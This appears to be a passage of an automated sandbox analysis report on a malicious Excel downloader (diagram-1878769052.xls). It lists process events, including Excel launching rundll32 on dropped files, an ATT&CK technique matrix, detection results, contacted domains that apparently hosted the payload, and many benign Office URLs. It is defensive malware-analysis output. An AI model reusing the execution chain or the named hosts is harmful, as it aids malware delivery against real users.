      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\durio.fur,DllRegisterServer
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\durio.fur1,DllRegisterServer
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\durio.fur,DllRegisterServer
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\durio.fur1,DllRegisterServer
      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: diagram-1878769052.xlsInitial sample: OLE indicators vbamacros = False
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: rundll32.exe, 00000004.00000002.676783236.0000000004430000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: rundll32.exe, 00000004.00000002.676783236.0000000004430000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: rundll32.exe, 00000004.00000002.676783236.0000000004430000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: rundll32.exe, 00000004.00000002.676783236.0000000004430000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Yara detected hidden Macro 4.0 in ExcelShow sources
      Source: Yara matchFile source: diagram-1878769052.xls, type: SAMPLE
      Source: Yara matchFile source: diagram-1878769052.xls, type: SAMPLE

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting2Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      diagram-1878769052.xls38%ReversingLabsDocument-Excel.Downloader.EncDoc

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
      https://directory.services.0%URL Reputationsafe
      https://directory.services.0%URL Reputationsafe
      https://directory.services.0%URL Reputationsafe
      https://staging.cortana.ai0%URL Reputationsafe
      https://staging.cortana.ai0%URL Reputationsafe
      https://staging.cortana.ai0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      hallakjewelry.com
      192.185.195.245
      truefalse
        unknown
        founderscirclecapital.eu
        unknown
        unknowntrue
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.diagnosticssdf.office.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
            high
            https://login.microsoftonline.com/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
              high
              https://shell.suite.office.com:14433C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                high
                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                  high
                  https://autodiscover-s.outlook.com/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                    high
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                      high
                      https://cdn.entity.3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://api.addins.omex.office.net/appinfo/query3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                        high
                        https://clients.config.office.net/user/v1.0/tenantassociationkey3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                          high
                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                            high
                            https://powerlift.acompli.net3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://rpsticket.partnerservices.getmicrosoftkey.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://lookup.onenote.com/lookup/geolocation/v13C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                              high
                              https://cortana.ai3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                high
                                https://cloudfiles.onenote.com/upload.aspx3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                  high
                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                    high
                                    https://entitlement.diagnosticssdf.office.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                      high
                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                        high
                                        https://api.aadrm.com/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://ofcrecsvcapi-int.azurewebsites.net/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                          high
                                          https://api.microsoftstream.com/api/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                            high
                                            https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                              high
                                              https://cr.office.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                high
                                                https://portal.office.com/account/?ref=ClientMeControl3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                  high
                                                  https://graph.ppe.windows.net3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                    high
                                                    https://res.getmicrosoftkey.com/api/redemptionevents3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://powerlift-frontdesk.acompli.net3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://tasks.office.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                      high
                                                      https://officeci.azurewebsites.net/api/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://sr.outlook.office.net/ws/speech/recognize/assistant/work3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                        high
                                                        https://store.office.cn/addinstemplate3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://outlook.office.com/autosuggest/api/v1/init?cvid=3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                          high
                                                          https://globaldisco.crm.dynamics.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                            high
                                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                              high
                                                              https://store.officeppe.com/addinstemplate3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://dev0-api.acompli.net/autodetect3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.odwebp.svc.ms3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://api.powerbi.com/v1.0/myorg/groups3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                high
                                                                https://web.microsoftstream.com/video/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                  high
                                                                  https://graph.windows.net3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                    high
                                                                    https://dataservice.o365filtering.com/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://officesetup.getmicrosoftkey.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://analysis.windows.net/powerbi/api3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                      high
                                                                      https://prod-global-autodetect.acompli.net/autodetect3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.json3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                        high
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                          high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                            high
                                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                              high
                                                                              https://ncus.contentsync.3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                high
                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                  high
                                                                                  http://weather.service.msn.com/data.aspx3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                    high
                                                                                    https://apis.live.net/v5.0/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                      high
                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                        high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                          high
                                                                                          https://management.azure.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                            high
                                                                                            https://wus2.contentsync.3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://incidents.diagnostics.office.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                              high
                                                                                              https://clients.config.office.net/user/v1.0/ios3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                high
                                                                                                https://insertmedia.bing.office.net/odc/insertmedia3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                  high
                                                                                                  https://o365auditrealtimeingestion.manage.office.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                    high
                                                                                                    https://outlook.office365.com/api/v1.0/me/Activities3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                      high
                                                                                                      https://api.office.net3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                        high
                                                                                                        https://incidents.diagnosticssdf.office.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                          high
                                                                                                          https://asgsmsproxyapi.azurewebsites.net/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://clients.config.office.net/user/v1.0/android/policies3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                            high
                                                                                                            https://entitlement.diagnostics.office.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                              high
                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                high
                                                                                                                https://substrate.office.com/search/api/v2/init3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office.com/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                    high
                                                                                                                    https://storage.live.com/clientlogs/uploadlocation3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                      high
                                                                                                                      https://templatelogging.office.com/client/log3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office365.com/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                          high
                                                                                                                          https://webshell.suite.office.com3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                            high
                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                              high
                                                                                                                              https://management.azure.com/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                high
                                                                                                                                https://login.windows.net/common/oauth2/authorize3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://graph.windows.net/3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drfalse
                                                                                                                                    high
